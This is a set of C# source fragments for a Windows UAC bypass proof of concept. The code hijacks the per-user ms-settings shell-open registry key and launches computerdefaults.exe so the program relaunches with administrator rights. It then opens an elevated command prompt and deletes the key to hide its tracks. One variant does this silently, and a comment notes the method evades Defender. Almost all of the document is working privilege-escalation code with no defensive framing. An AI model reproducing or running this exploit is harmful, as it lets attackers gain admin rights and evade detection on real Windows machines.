public static void UAC() { WindowsPrincipal windowsPrincipal = new WindowsPrincipal(WindowsIdentity.GetCurrent()); if (!windowsPrincipal.IsInRole(WindowsBuiltInRole.Administrator)) { Bypass.Z("Classes"); Bypass.Z("Classes\\ms-settings"); Bypass.Z("Classes\\ms-settings\\shell"); Bypass.Z("Classes\\ms-settings\\shell\\open"); RegistryKey registryKey = Bypass.Z("Classes\\ms-settings\\shell\\open\\command"); string cpath = System.Reflection.Assembly.GetExecutingAssembly().Location; registryKey.SetValue("", cpath, RegistryValueKind.String); registryKey.SetValue("DelegateExecute", 0, RegistryValueKind.DWord); registryKey.Close(); try { Process.Start(new ProcessStartInfo { CreateNoWindow = true, UseShellExecute = false, FileName = "cmd.exe", Arguments = "/c start computerdefaults.exe" }); } catch { } Process.GetCurrentProcess().Kill(); } else { RegistryKey registryKey2 = Bypass.Z("Classes\\ms-settings\\shell\\open\\command"); registryKey2.SetValue("", "", RegistryValueKind.String); } }
static void Main() { try { if (!IsAdministrator()) { DialogResult result = MessageBox.Show("Process is not elevated want to exploit?", "UAC_Bypass_POC", MessageBoxButtons.YesNoCancel); if (result == DialogResult.Yes) { Bypass.UAC(); } else if (result == DialogResult.Cancel) { Environment.Exit(0); } else if (result == DialogResult.No) { Environment.Exit(0); } } else if (IsAdministrator()) { string command = "/c start cmd.exe "; //once elevated what to run. Process.Start("CMD.exe", command); RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true); uac_clean.DeleteSubKeyTree("shell"); uac_clean.Close(); System.Windows.Forms.MessageBox.Show("Process Elevated!"); } }catch { Environment.Exit(0); } }
public static RegistryKey Z(string x) { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\" + x, true); bool flag = !Bypass.checksubkey(registryKey); if (flag) { registryKey = Registry.CurrentUser.CreateSubKey("Software\\" + x); } return(registryKey); }
static void Main() { try { if (!IsAdministrator()) { Bypass.UAC(); } else if (IsAdministrator()) { //this method seems to bypass defender //5-02-2021 and binary is not flagged string WhatToElevate = "cmd.exe"; // cmd.exe will be elevated as an example and PoC Process.Start("CMD.exe", "/c start " + WhatToElevate); RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true); uac_clean.DeleteSubKeyTree("shell"); //deleting this is important because if we won't delete that right click of windows will break. uac_clean.Close(); } }catch { Environment.Exit(0); } }
public static string GetOsVer() { string result; try { ManagementObject mngObj = Bypass.GetMngObj("Win32_OperatingSystem"); bool flag = mngObj == null; if (flag) { result = string.Empty; } else { result = (mngObj["Version"] as string); } } catch (Exception ex) { result = string.Empty; } return(result); }